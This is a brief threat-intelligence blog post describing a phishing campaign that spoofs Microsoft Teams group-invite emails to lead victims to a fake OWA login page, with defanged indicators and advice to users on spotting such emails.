Unquestionably one of the most spoofed brands, in email attacks, over the past several years has been Microsoft. Recently, threat actors have continued with some clever spoofed Microsoft Teams emails. One of the most popular variations of MS Teams attacks mimic the legitimate emails sent when a user is added to a Teams group. This example originated in Hungary from the domain godmanmedicalsi.]store. Generic tld’s, such as u.]store, are commonly abused at times when hosting companies conduct yearly registration deals to promote a specific gtld. This domain was registered thru Namecheap who currently offers the first year for y.]store tld’s at .98 (USD), threat actors love a bargain as much as anyone.

The payload link leads to a phishing portal that mimics the MS 365 OWA login portal design. However, this actor removed all the Microsoft branding and favicon with the likely goal of avoiding security product detections and keep the page active for a longer duration.

In addition to removing the Microsoft branding, we also see the threat actor has obfuscated the source code by packing the JavaScript. We have unpacked it in the text file below to see how and where they were posting the stolen credentials.

Users need to be extra vigilant when it comes to any Microsoft themed emails given how often they are spoofed. By paying close attention to the sender and the destination URL in this email it could easily be flagged as phishing. Also, navigating directly to the source (Teams- in this case) is always a good way to avoid falling prey to phishing attacks.